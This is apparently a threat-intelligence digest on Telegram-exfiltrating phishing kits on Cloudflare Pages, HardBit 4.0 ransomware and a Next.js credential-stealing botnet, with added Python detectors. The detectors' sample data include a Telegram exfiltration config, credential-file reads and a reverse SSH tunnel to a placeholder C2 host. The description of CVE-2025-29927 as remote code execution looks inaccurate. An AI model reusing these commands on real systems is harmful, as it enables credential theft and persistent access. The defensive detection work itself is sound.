Phishers Exploit Cloudflare Pages and Telegram to Scale Credential Theft
Threat actors are increasingly abusing free developer hosting platforms, most notably Cloudflare Pages, to host highly convincing phishing portals that impersonate banking, insurance, and healthcare providers. These campaigns frequently leverage compromised legitimate websites as redirectors, allowing phishing links to originate from trusted domains before silently forwarding victims to attacker-controlled *.pages[.]dev subdomains. The phishing kits closely replicate real login workflows, intentionally triggering failed login states to prompt victims for additional information such as security question answers, backup verification data, and other recovery details that can be used to bypass multi-factor authentication and account protection controls. Rather than exfiltrating stolen data to traditional command-and-control infrastructure, the kits transmit captured credentials directly to Telegram bots using hardcoded tokens and chat IDs embedded in client-side JavaScript. This provides attackers with real-time access to harvested data, enables rapid infrastructure rotation, and reduces exposure to domain- and IP-based blocking controls. The use of Telegram also lowers operational overhead by eliminating the need to maintain dedicated backend servers while blending malicious traffic with legitimate messaging activity. The combination of free cloud hosting, compromised redirectors, and Telegram-based exfiltration significantly increases campaign resilience and operational speed, highlighting a broader shift toward abusing mainstream platforms to evade detection and takedown efforts while scaling credential theft operations. Organizations should treat authentication pages hosted on generic developer platforms as inherently untrusted, strengthen email security controls to detect multi-stage redirects involving compromised legitimate domains, and monitor for browser-based exfiltration to messaging platforms such as Telegram. 
Enforcing phishing-resistant MFA, limiting reliance on static security questions, and educating users to avoid logging in through unsolicited links can significantly reduce the effectiveness of these campaigns even when the infrastructure appears legitimate.
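The monitoring the paragraph above calls for can be checked against artefacts of this kit style: client-side JavaScript carrying a Telegram bot token and chat id, proxy logs showing a compromised site redirecting into *.pages.dev, and browser-originated POSTs to the Bot API. The following Python detector is an added example, not code from the article or from any phishing kit; the JavaScript fragment, the proxy log format and the token/chat id values are constructed placeholders, and the token shape regex is an assumption about the Bot API token format.

```python
import re
from urllib.parse import urlsplit

# Constructed sample of the hardcoded exfil config the article describes
# (placeholder token and chat id, not a real bot; form handling omitted).
SAMPLE_JS = '''
const TG_API = "https://api.telegram.org/bot123456789:AAHConstructedExampleToken000000001/sendMessage";
const CHAT_ID = "-1001234567890";
'''

# Constructed proxy log lines: client, method, url, status, referer=, location=.
SAMPLE_PROXY_LOG = [
    "10.0.0.5 GET https://www.example-church.org/wp-content/go.php 302 referer=- location=https://secure-login-acme.pages.dev/",
    "10.0.0.5 GET https://secure-login-acme.pages.dev/ 200 referer=- location=-",
    "10.0.0.5 POST https://api.telegram.org/bot123456789:AAHConstructedExampleToken000000001/sendMessage 200 referer=https://secure-login-acme.pages.dev/ location=-",
    "10.0.0.7 GET https://www.example.com/ 200 referer=- location=-",
]

TOKEN_RE = re.compile(r"(?<!\d)\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")  # assumed bot token shape
CHAT_ID_RE = re.compile(r"chat_?id\W{0,4}(-?\d{6,14})", re.I)
PAGES_DEV_RE = re.compile(r"^[a-z0-9-]+\.pages\.dev$", re.I)
TELEGRAM_HOST = "api.telegram.org"

def scan_js(src):
    """Flag client-side code that embeds a Bot API URL, a bot token and a chat id."""
    return {
        "telegram_api": TELEGRAM_HOST + "/bot" in src,
        "bot_tokens": TOKEN_RE.findall(src),
        "chat_ids": CHAT_ID_RE.findall(src),
    }

def scan_proxy_log(lines):
    """Flag redirector hops into *.pages.dev and browser POSTs carrying a bot token."""
    hits = []
    for line in lines:
        client, method, url, status, referer, location = line.split()
        referer = referer.split("=", 1)[1]
        location = location.split("=", 1)[1]
        host = urlsplit(url).hostname or ""
        loc_host = urlsplit(location).hostname or ""
        # A non-pages.dev site answering 3xx into pages.dev is the redirector pattern.
        if status.startswith("3") and PAGES_DEV_RE.match(loc_host) and not PAGES_DEV_RE.match(host):
            hits.append((client, "redirect_to_pages_dev", host, loc_host))
        # A POST to the Bot API with a token in the URL from a web page is the exfil pattern.
        if method == "POST" and host == TELEGRAM_HOST and TOKEN_RE.search(url):
            hits.append((client, "browser_exfil_to_telegram", urlsplit(referer).hostname or "-", host))
    return hits
```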
HardBit 4.0: An Authorization-Gated Ransomware Focused on Stealth, Persistence, and Destructive Impact
HardBit is a ransomware strain active since 2022 that differentiates itself from many contemporary ransomware operations by not operating a public data leak site, instead focusing exclusively on encryption and optional destruction of victim data. The latest iteration, HardBit 4.0, represents a clear maturation of the malware, introducing stronger obfuscation, operational safeguards, and execution controls designed to limit analysis and misuse. Most notably, HardBit 4.0 leverages the long-standing Neshta file-infector malware as a dropper, allowing the ransomware payload to be decrypted and launched in a manner that blends into normal executable behavior while also establishing persistence through registry modification. Operationally, HardBit 4.0 is built for flexibility and control. The malware is distributed in both command-line and graphical variants, suggesting use by operators with varying skill levels, and introduces a runtime authorization model that requires a decoded authorization ID and encryption key before execution. This mechanism significantly complicates sandboxing and automated analysis, as the ransomware will not run without operator-supplied inputs. In addition to standard encryption functionality, the GUI version includes a configurable “Wiper” mode that permanently destroys data instead of encrypting it, indicating an intent to support destructive operations where ransom recovery is not the primary objective. Combined with aggressive disabling of Windows Defender protections, credential harvesting for lateral movement, and systematic removal of recovery options, HardBit 4.0 is positioned as a controlled, high-impact ransomware tool optimized for stealth, operator control, and maximum disruption. To reduce exposure to HardBit-style ransomware, organizations should prioritize restricting external access to RDP and SMB services, enforcing strong authentication, and monitoring for brute-force activity and anomalous lateral movement.
Update: Industrial-Scale Exploitation of Next.js Infrastructure and Automated Credential Exfiltration
Monitoring an exposed Docker honeypot revealed an active, highly automated exploitation campaign targeting publicly accessible Next.js and React-based applications at scale. The activity is attributed to a threat actor identifying as “PCP,” based on consistent file signatures, embedded strings, and recurring infrastructure patterns observed across multiple compromised hosts. The campaign leverages chained remote code execution vulnerabilities, specifically CVE-2025-29927, to gain unauthenticated command execution on vulnerable servers. Once access is established, the malware systematically enumerates sensitive assets, including environment configuration files, cloud credentials, SSH private keys, Docker authentication tokens, and Git credentials. The exploitation process is fully automated and designed to rapidly validate targets before escalating to deeper system compromise. This operational model allows the actor to transition from reconnaissance to credential exfiltration and persistence with minimal dwell time and little need for manual oversight. Following successful exploitation, compromised systems are converted into durable infrastructure nodes by deploying SOCKS proxies, reverse tunnels, and multiple system services that ensure persistence across reboots and failures. Direct reconnaissance of the live command-and-control environment confirmed 59,128 successful server compromises in under 48 hours, reflecting a 64.6% exploitation success rate across more than 91,000 scanned targets. The exposed C2 APIs lack authentication or validation controls, enabling unrestricted task distribution, telemetry collection, and large-scale ingestion of stolen credentials. This design supports continuous scanning and reinfection cycles, allowing the botnet to expand rapidly while maintaining centralized control over compromised assets. 
At its current operational tempo, the campaign presents a critical risk to cloud infrastructure, CI/CD environments, and software supply chains that rely on exposed application runtimes. Organizations should prioritize immediate patching of affected frameworks, rotate all potentially exposed credentials, block known C2 infrastructure, hunt for unauthorized persistence mechanisms, and implement continuous monitoring to reduce attack surface and prevent reinfection by similar automated exploitation campaigns.
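The hunt for unauthorized persistence recommended above can key on the sequence the article describes: rapid reads of environment files, cloud credentials, SSH keys, Docker auth and Git credentials, followed by tunnels or new services. The Python triage below is an added example, not code from the article or from the campaign's tooling; the audit line format, the user names and the command lines are constructed, and the file paths and persistence patterns are assumptions about typical layouts rather than indicators taken from the campaign.

```python
import re
from datetime import datetime

# Constructed audit lines ("timestamp user command"), modelled on the post-exploitation
# sequence the article describes; not captured from the actual campaign.
SAMPLE_AUDIT = [
    "2025-06-01T10:00:00Z node cat /app/.env",
    "2025-06-01T10:00:01Z node cat /root/.aws/credentials",
    "2025-06-01T10:00:01Z node cat /root/.ssh/id_rsa",
    "2025-06-01T10:00:02Z node cat /root/.docker/config.json",
    "2025-06-01T10:00:02Z node cat /root/.git-credentials",
    "2025-06-01T10:00:09Z node ssh -N -R 0.0.0.0:2222:localhost:22 user@c2.invalid",
    "2025-06-01T10:00:10Z node systemctl enable --now proxy-node.service",
    "2025-06-01T11:30:00Z deploy cat /app/.env",   # routine single read: should not alert
]

# Assumed locations of the asset classes the article lists.
SECRET_PATTERNS = {
    "env_file": re.compile(r"/\.env\b"),
    "cloud_creds": re.compile(r"\.aws/credentials|\.azure/|gcloud/"),
    "ssh_key": re.compile(r"\.ssh/id_[a-z0-9]+\b(?!\.pub)"),
    "docker_auth": re.compile(r"\.docker/config\.json"),
    "git_creds": re.compile(r"\.git-credentials"),
}
# Reverse/forward SSH tunnels, service enablement or SOCKS setup after the harvest.
PERSIST_RE = re.compile(r"\bssh\b.*\s-[NR]\b|systemctl\s+enable|socks", re.I)

def parse(line):
    ts, user, cmd = line.split(" ", 2)
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), user, cmd

def triage(lines, min_kinds=3, window=60, follow=600):
    """Alert when one user touches >= min_kinds secret classes within `window`
    seconds; escalate to critical if a persistence command follows within `follow`."""
    by_user = {}
    for ts, user, cmd in map(parse, lines):
        by_user.setdefault(user, []).append((ts, cmd))
    alerts = []
    for user, evs in by_user.items():
        for i, (t0, _) in enumerate(evs):
            kinds = set()
            for t, cmd in evs[i:]:
                if (t - t0).total_seconds() > window:
                    break
                kinds.update(k for k, rx in SECRET_PATTERNS.items() if rx.search(cmd))
            if len(kinds) < min_kinds:
                continue
            persist = [cmd for t, cmd in evs[i:]
                       if (t - t0).total_seconds() <= follow and PERSIST_RE.search(cmd)]
            alerts.append({"user": user, "start": t0.isoformat(), "kinds": sorted(kinds),
                           "persistence": persist, "severity": "critical" if persist else "high"})
            break  # one alert per user is enough to open an investigation
    return alerts
```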